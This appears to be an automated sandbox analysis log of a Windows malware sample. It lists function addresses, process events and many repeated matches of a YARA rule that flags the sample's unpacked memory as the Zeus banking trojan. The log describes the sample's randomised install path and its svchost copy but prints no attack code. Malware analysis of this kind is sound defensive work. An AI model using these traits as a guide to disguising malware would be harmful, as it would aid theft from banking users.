Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015466308_2_01546630
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154F6208_2_0154F620
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014CE9708_2_014CE970
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E70D08_2_014E70D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F10F08_2_014F10F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EB8808_2_014EB880
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F58A08_2_014F58A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014ED3408_2_014ED340
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014D9B808_2_014D9B80
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F0A208_2_014F0A20
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E7A308_2_014E7A30
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B9D308_2_014B9D30
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EEC008_2_014EEC00
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E7C108_2_014E7C10
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E5C308_2_014E5C30
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B9F508_2_014B9F50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F17C08_2_014F17C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014BF7E08_2_014BF7E0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EF7908_2_014EF790
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B3FA08_2_014B3FA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EDFA08_2_014EDFA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E56508_2_014E5650
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F96138_2_014F9613
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F2EDD8_2_014F2EDD
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E06D08_2_014E06D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EC6D08_2_014EC6D0
Source: C:\Users\user\Desktop\uavINoSIQh.exe Process token adjusted: Security
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 784
Source: uavINoSIQh.exe Static PE information: Number of sections : 13 > 10
Source: svchost.exe.0.dr Static PE information: Number of sections : 13 > 10
Source: uavINoSIQh.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.2.svchost.exe.26a3c00.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.e440000.47.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.11c2000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.79.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d02000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.2700000.56.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.2700000.43.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.75.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.67.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.85.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.82.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.67.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ab0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.76.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.4900000.48.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.83.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 0.3.uavINoSIQh.exe.59cb00.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.2700000.42.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 0.3.uavINoSIQh.exe.597700.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.2700000.61.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.22c0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.82.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.66.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.62.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.2700000.61.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.2700000.52.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.77.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.65.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7
Source: 2.3.svchost.exe.b00000.64.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.77.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.59.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2452000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.63.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.53.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.80.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.75.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1342000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.65.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2702000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.14b2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.14b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
